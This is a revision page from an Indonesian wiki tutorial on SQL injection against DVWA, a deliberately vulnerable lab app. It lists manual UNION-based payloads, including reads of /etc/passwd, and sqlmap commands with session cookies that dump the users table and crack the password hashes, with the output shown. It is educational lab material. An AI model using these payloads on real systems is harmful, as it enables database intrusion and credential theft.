Difference between revisions of "SQLMap: Contoh SQL Injection ke DVWA"

From OnnoWiki
Jump to navigation Jump to search
Line 60: Line 60:
  
  
  sqlmap -u http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' -cookie="security=low; PHPSESSID=7tjk85n07vqlabqf3ij2v858h1" -dbs
+
  sqlmap -u http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit# \
 +
-cookie="security=low; PHPSESSID=7tjk85n07vqlabqf3ij2v858h1" -dbs
  
  

Revision as of 06:31, 14 November 2014

Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/

Latar Belakang

Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual.


Proses manual untuk test Vulnerability

Cek apakah situs kita vulnerable 

1′ or ’2′=’2

Kita perlu melihat berapa banyak kolom sebelum ada error. 

‘ and 1=1 union select 1,2 #
‘ and 1=1 union select 1,2,3 #

Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom.

Mari kita melakukan injection. 

‘ union SELECT 1, user() — ‘
‘ and 1=1 union select database(),version() #
‘ union SELECT 1, user() #
‘ and 1=1 union select null,table_schema from information_schema.tables #
‘ and 1=1 union select table_name,table_schema from information_schema.tables #
‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ #
‘ and 1=1 union select first_name,password from dvwa.users #
‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ #
‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ #
‘ union select user, password FROM users #
‘ union SELECT 1, load_file(‘/etc/hosts’) #
‘ union SELECT 1, load_file(‘/etc/passwd’) #

Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.


Menggunakan SQLMAP

Parameter yang kita gunakan & artinya 

-u      URL yang dituju
-cookie mengirimkan / mengemulasi sebuah cookie header

Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh 

Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7

-dbs Ini akan memberikan daftar database jika sukses dilakukan.
-D   Ini untuk menentukan database yang diserang. 
-tables untuk melihat daftar tabel dari database -D parm. 
-columns untuk melihat kolom di -tables parm
-current-user untuk melihat current user yang menjalankan SQL
-users untuk melihat semua users dari SQL
-passwords untuk memberikan password yang di hash dari SQL instance.

Contoh Eksekusi

sqlmap -u http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit# \
-cookie="security=low; PHPSESSID=7tjk85n07vqlabqf3ij2v858h1" -dbs


sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ –dbs

Returns [15:17:52] [INFO] fetching database names available databases [4]: [*] dvwa [*] information_schema [*] mysql [*] performance_schema sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa –tables

Returns [15:18:19] [INFO] fetching tables for database: ‘dvwa’ Database: dvwa [2 tables] +———–+ | guestbook | | users | +———–+ sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa -T users –columns

Returns [15:19:14] [INFO] fetching columns for table ‘users’ in database ‘dvwa’ Database: dvwa Table: users [6 columns] +————+————-+ | Column | Type | +————+————-+ | user | varchar(15) | | avatar | varchar(70) | | first_name | varchar(15) | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +————+————-+ sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa -T users –dump

–dump will dump the data if there are passwords that are hashed depending on the version of SQLMAP you have will prompt to crack the passwords. You can specify your own dictionary or you can use the one that they specify. However the base dictionary cracks all the user passwords

See the output

[15:21:44] [INFO] starting dictionary-based cracking (md5_generic_passwd) [15:21:44] [INFO] starting 4 processes [15:21:47] [INFO] cracked password ‘abc123′ for hash ‘e99a18c428cb38d5f260853678922e03′ [15:21:50] [INFO] cracked password ‘charley’ for hash ’8d3533d75ae2c3966d7e0d4fcc69216b’ [15:21:53] [INFO] cracked password ‘letmein’ for hash ’0d107d09f5bbe40cade3de5c71e9e9b7′ [15:21:55] [INFO] cracked password ‘password’ for hash ’5f4dcc3b5aa765d61d8327deb882cf99′ Database: dvwa Table: users [5 entries] +———+———+———————————————————–+———–+————+ | user_id | user | password | last_name | first_name | +———+———+———————————————————–+———–+————+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | 2 | gordonb| e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | +———+———+———————————————————–+———–+————+

There you have it you know just gained access to all the sql users.

Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=SQLMap:_Contoh_SQL_Injection_ke_DVWA&oldid=41318"